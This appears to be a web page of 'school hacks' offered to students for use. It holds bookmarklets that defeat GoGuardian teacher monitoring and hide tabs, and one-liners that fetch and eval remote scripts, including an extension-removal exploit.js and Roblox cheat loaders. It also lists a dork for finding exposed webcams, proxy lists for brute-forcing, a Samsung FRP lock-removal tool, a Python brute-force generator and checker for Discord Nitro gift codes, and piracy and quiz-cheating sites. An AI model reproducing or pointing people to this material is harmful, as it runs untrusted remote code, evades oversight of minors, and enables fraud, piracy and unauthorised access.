Open Blank Cloaking Tab:
Cloaking Tabs
Name the bookmark whatever you'd like, then Choose the Favicon
javascript:(function () {document.title=prompt('Tab Cloak\n\nEnter new Tab Title:');var icon=document.querySelector ('link[rel="icon"]');switch(prompt('Choose new tab icon:\n\n[1] Google Search\n[2] Google Drive\n[3] Custom URL')) {case'1':icon.setAttribute('href','https://www.google.com/favicon.ico');break;case'2':icon.setAttribute ('href','https://ssl.gstatic.com/images/branding/product/2x/hh_drive_96dp.png');break;case'3':icon.setAttribute ('href',prompt('Enter Custom Tab Icon URL:'))}})()
Remove Youtube Ads & Restricted Mode
Create bookmarklet with the code, then use the bookmark on Youtube.com
javascript:(function () {if (window.location.toString().includes('www.youtube.com/watch?v%27))%20{%20 window.open(%27https://www.youtube-nocookie.com/embed/%27%20+%20window.location.toString().split(%27=%27)[1])%20}})()
Block Goguardian tab closing
This bookmarklet stops your teacher from closing your tabs via goguardian
javascript:(function () {window.onbeforeunload = function() { return 1; };})()
HTML Goggles
Allows you to edit the Raw HTMl of a Website
javascript:(function () {var script=document.createElement('script'); script.src='https://x-ray-goggles.mouse.org/webxray.js';script.className='webxray';script.setAttribute('data-lang','en-US') ;script.setAttribute('data-baseuri','https://x-ray-goggles.mouse.org');document.body.appendChild(script);}())
Extension Remover
First, go to chrome.google.com/webstorex then press this bookmarklet to remove extensions
javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
Invert page colors
First, make a bookmarklet then press on the page you wanna invert the colors of
javascript:void(document.head.appendChild(document.createElement('script')) .src='https://cdn.jsdelivr.net/gh/oblnabil/oblnabil.github.io@main/hx/invertmedia.js')
Developer Console
Turn into bookmark, paste code as url, check bottom right of screen
javascript:(function () { var script = document.createElement('script'); script.src="//cdn.jsdelivr.net/npm/eruda"; document.body.appendChild(script); script.onload = function () { eruda.init() } })();
About:Blank Tab Custom link
Turn code into bookmark, type link but MUST allow popups to create tab
javascript: (function () {var url = prompt("Paste the link you want to be embedded into an about:blank page.\n (INCLUDE https://)", "LINK HERE"); var urlObj = new window.URL(window.location.href); win = window.open(); win.document.body.style.margin = "0"; win.document.body.style.height = "100vh"; var iframe = win.document.createElement ("iframe"); iframe.style.border = "none"; iframe.style.width = "100%"; iframe.style.height = "100%"; iframe.style.margin = "0"; iframe.referrerpolicy = "no-referrer"; iframe.allow = "fullscreen"; iframe.src = url.toString(); win.document.body.appendChild(iframe); })();
History Flooder
Whatever Tab your Currently on, will be put into your history your desired number of times
javascript:var num=prompt("History flood amount:");done=false;x=window.location.href;for (var i=1; i<=num; i++){history.pushState(0,
0, i==num?x:i.toString());if(i==num){done=true}}if(done===true){alert("History flood successful! "+window.location.href+" now appears in your history "+num+(num==1?" time.":" times."))}
Chromium browser (Completely Unblocked everything)
Visit the project (created by us!) and click run to freely browse the web
https://replit.com/@Infray/important-school-work
Bookmark Autoclicker (100cps)
Create new bookmark & paste this code as url, then run the bookmark and click where u want to autoclick
javascript:var DELAY = 1;var autoClickerStyleElement = document.createElement("style"); autoClickerStyleElement.innerHTML="*{cursor: crosshair !important;}";document.body.appendChild (autoClickerStyleElement);function addClicker(e) {if(!e.isTrusted) {return;}if(e.target.classList.contains("auto-clicker-target")) {e.target.classList.remove("auto-clicker-target");} else {e.target.classList.add("auto-clicker-target");}document.body.removeChild (autoClickerStyleElement);document.body.removeEventListener("click", addClicker);e.preventDefault();autoClick(e.target);}function autoClick(element) {if(element.classList.contains("auto-clicker-target")) {element.click();setTimeout(function() { autoClick(element); }, DELAY);}}document.body.addEventListener("click", addClicker, 0);
Bookmark Autoclicker (Custom CPS)
Create new bookmark & paste this code as url, then run the bookmark, choose your cps, and click where u want to autoclick
javascript:(function(x,y){if(!window.click){window.click=!0,document.body.style.cursor='crosshair';var cps=prompt ('Autoclicker CPS: (Under 200 recommended)');if(!cps||isNaN(cps)?(alert(%27You entered something wrong. Try running the script again.%27) ,end()):alert(%27Autoclicker activated at %27+cps+%27 CPS! Do [ctrl+e] to stop.%27),addEventListener(%27mousemove%27,e=>{x=e.clientX,y=e.clientY}) ,addEventListener(%27keydown%27,e=>{%27e%27===e.key&&e.ctrlKey&&(alert(%27Autoclicker deactivated! Click the bookmark again to reactivate!%27),end())}),window.click) var int=setInterval(function(){var e=document.elementFromPoint(x,y);e&&e.click()},1e3/cps);function end(){clearInterval(int),window.click=!1,document.body.style.cursor=%27default%27}}})()
Editable Page
Copy code and paste as bookmark url to make page editable
javascript:document.body.contentEditable = 'true'; document.designMode='on'; void 0
Non-Editable Page
Revert back to normal page to hide that you edited anything
javascript:document.body.contentEditable = 'false'; document.designMode='off'; void 0
Youtube Alternatives
These links have all the YouTube videos hosted elsewhere
invidious.weblibre.org yewtu.be y.com.sb vid.puffyan.us inv.riverside.rocks (recommended) invidious.kavin.rocks invidious.namazso.eu youtube.076.ne.jp tube.cthd.icu
Proxitok
These links have all the TikTok videos hosted elsewhere
proxitok.pabloferreiro.es proxitok.pussthecat.org tok.habedieeh.re proxitok.esmailelbob.xyz proxitok.privacydev.net tok.artemislena.eu tok.adminforge.de tik.hostux.net tt.vern.cc proxitok.pufe.org cringe.whatever.social proxitok.lunar.icu proxitok.privacy.com.de tiktok.chauvet.pro
Kick-Asteroids
Spawn a rocket ship you can control with WASD & shoot with SPACE, you can shoot words on poage for points
javascript:var%20KICKASSVERSION='2.0';var%20s%20=%20document.createElement
('script'); s.type='text/javascript';document.body.appendChild(s);s.src=
'//hi.kickassapp.com/kickass.js';void(0);
Whatfont?
Clicking this bookmark, then the font you want to select will show font name, size & more details about the font
javascript:(function(){var d=document,s=d.createElement('scr'+'ipt'),b=d.body,l=d.location;s.setAttribute ('src','http://chengyinliu.com/wf.js?o='+encodeURIComponent(l.href)+'&t='+(new Date().getTime()));b.appendChild(s)})();
Kahoot Hack Sites
These sites will help you win kahoot games
https://kahoot.rocks/ https://pxtrez.com/kahoot (recommended)
Edpuzzle Answers & Skip Video
Must allow popups, use bookmarklet on page of your edpuzzle
javascript: fetch("https://cdn.jsdelivr.net/gh/ading2210/edpuzzle-answers@latest/script.js").then(r => r.text()).then(r => eval(r))
Quizlet Hack Sites
These sites will let you cheat for answers on quizlet games
https://schoolcheats.net/quizlet/ https://gist.github.com/theonlytruegod/1d61841f3294f419bbe8b800143deba1
Google Snake Addon
Search "Google Snake" on google, click play, then paste this code into a bookmark url and click it
javascript: req = new XMLHttpRequest(); req.open('GET', 'https://raw.githubusercontent.com/DarkSnakeGang/GoogleSnakeCustomMenuStuff/main/custom.js'); req.onload = function() { eval(this.responseText + 'snake.more_menu();'); }; req.send();
Idle Breakout Infinite Money
Copy and paste this into the "import" box on the Idle Breakout settings page
MTgzNixJbmZpbml0eSxJbmZpbml0eSwyMTcsMCwxNjUyNTgsMTY1MjU4LDgxMTMyLDUsMSwxLDEsMSwwLDQzN Tk1Ljc4LDQ2ODE1MTM5LDAsMCwwLDAsMCwwLDAsMCwwLDAsMTkzODc1Njg1MCwxOTM4NzU2ODUwL DAsMCwwLDAsMCwxMDAwLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDAsNSwyNTUsMCwzMywwLDEwLD ksMTY0LDQsOTUsMCwwLDAsMCwwLDEsMCwwLDAsMSwxLDEsMCwwLDAsMCwwLDEsMSwxLDEsMCwxLDEsMSwxLDAsMSwxLD EsMSwwLDEsMSwxLDEsMCwxLDEsMSwxLDAsMSwxLDEsMSwwLEluZmluaXR5LDAsMCwwLDEsSW5maW5pdHksMSwwLDAs
Idle Breakout level 260464
Goes to level 260464, no balls purchased, no upgrades, no skill points, a lot of money
MjYwNDY0LDFlKzMwMixJbmZpbml0eSw0MDE4NywwLDE1MjY0NTkzLDE1MjY0NTkzLDc2
Cookie Clicker Set Cookies/Add Cookies
Game.Earn adds cookies to your total, Game.cookies sets your total cookies. press Ctrl + Shift + J for console to run
Game.Earn(cookieount); & Game.cookies=1000;
Random live webcams
Pasting this code into the address bar will meet you with multiple random cameras broadcasting their footage online
intitle:"webcamxp 5" intext: "live stream"
SamFW FRP Tool
This tool can remove FRP, Google account lock, Password lock, and more from Samsung Phones
https://androidfilehost.com/?fid=15664248565197204837 https://www.virustotal.com/gui/file/0fd5e926d666222ec164174c00178bf0b4d4ee25dea59ac078acef16904a5486
Prxxy's for Bruteforcing
Use for bruteforcing inside checkers or generators
https://irunblocked.com/Proxies/23696.txt https://irunblocked.com/Proxies/2377.txt
Free m0vie & tv streaming sites
These sites help you watch m0vies for free! (some sites may go down without notice)
onionplay.se Fmovies.to soap2day.to moviesjoy.to moviesjoy.plus (recommended) gomovies.sx movieninja.online movieninja.live sflix.to 123movies.com Fmovies.app theputlocker.me soap2day.ac soap2day.sh soap2day.mx s2dfree.to s2dfree.cc s2dfree.de s2dfree.is s2dfree.nl 123moviesgo.ac goku.to skooltv.github.io
Google Drive m0vie stashes
Pasting this search term into the address bar will let you find tons of google drive m0vies
site:drive.google.com movies
Screen Spazz
This makes your screen spin, change color, play sounds, and have a odd cursor. Refresh to undo
https://github.com/xploitspeeds/Bookmarklet-Hacks-For-School/blob/main/Troll%20Bookmarklet%20%5BDOES%20LAG!%5D
Nitro gen python script
To run this you need to: import the py requests library, make a .txt file name it Nitro Codes.txt,then make another named Valid Codes.txt, finally make a .py script and name it main.py, paste the code then run inside of terminal.
import requests import random import string import time print("""NITRO GEN + CHECKER""") time.sleep(2) print("GET YOUR VALID NITROS AT VALID CODES.TXT") time.sleep(0.3) print("MADE BY INFRAY\n\n") time.sleep(0.2) num = int(input('HOW MANY CODES YOU WANT : ')) with open("Nitro Codes.txt", "w", encoding='utf-8') as file: print("STATUS : OK") start = time.time() for i in range(num): code = "".join(random.choices( string.ascii_uppercase + string.digits + string.ascii_lowercase, k = 16 )) file.write(f"https://discord.gift/{code}\n") print(f"GENERATED {num} CODES | TIME TAKEN : {time.time() - start}\n") with open("Nitro Codes.txt") as file: for line in file.readlines(): nitro = line.strip("\n") url = "https://discordapp.com/api/v6/entitlements/gift-codes/" + nitro + "?with_application=false&with_subscription_plan=true" r = requests.get(url) if r.status_code == 200: print(f" Valid | {nitro} ") break else: print(f" Invalid | {nitro} ") input("\nCHECK VALID CODES.TXT FOR VALID CODES")
Spinning Cursor
This makes your cursor spin. It won't go away Until you reload the page or visit a new one
javascript:iV33MaET=0;Cu4Xg8Y=new Array('n-resize','nw-resize','w-resize','sw-resize','s-resize','se-resize', 'e-resize','ne-resize');setInterval('iV33MaET++;document.body.style.cursor=Cu4Xg8Y[iV33MaET%8]',150)
ROBLOX Bitcoin Miner Script
This link has hacks for Roblox Bitcoin Miner (Executor needed)
loadstring(game:HttpGet("https://raw.githubusercontent.com/Xv3nm/lua-rblx-repo/main/Projects/CryptoKingpin"))()
ROBLOX Evade OP Blox Fruits Script
This link has hacks for Blox Fruits (Executor needed)
https://bit.ly/3RGAZZl
ROBLOX Chat Bypass Script
This script lets you bypass Roblox chat filters, press Q to activate (Executor Needed)
loadstring(game:HttpGet("https://raw.githubusercontent.com/synnyyy/synergy/additional/betterbypasser",true))()
ROBLOX Anime Fighting Simulator Auto-Farm Script
This script lets you autofarm inside Anime Fighting Simulator (Executor needed)
loadstring(game:HttpGet("https://raw.githubusercontent.com/synnyyy/synergy/additional/betterbypasser",true))()
ROBLOX Anime Fighting Simulator Infinite Yen Script
This script lets you obtain infinite yen inside Anime Fighting Simulator (Executor needed)
loadstring(game:HttpGet("https://raw.githubusercontent.com/scriptpastebin/raw/main/animefightingsimulator%22))()
ROBLOX Arsenal Aimbot Hacks Script
This script lets you have aimbot, ESP, and other various hacks in Arsenal (Executor needed)
loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
ROBLOX Muder Mystery Hub Hacks Script
This script lets you have xray, fast walk speed, fly toggle, and many more hacks (Executor needed)
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/Drifter0507/GUIS/main/MURDER%20MYSTERY%202", true))();
ROBLOX Bee Swarm Simulator Auto Sell + Dig Script
This script lets you automatically sell, dig, and kill mobs inside Bee Swarm Simulator (Executor needed)
loadstring(game:HttpGet("https://raw.githubusercontent.com/NukeVsCity/TheALLHACKLoader/main/NukeLoader"))()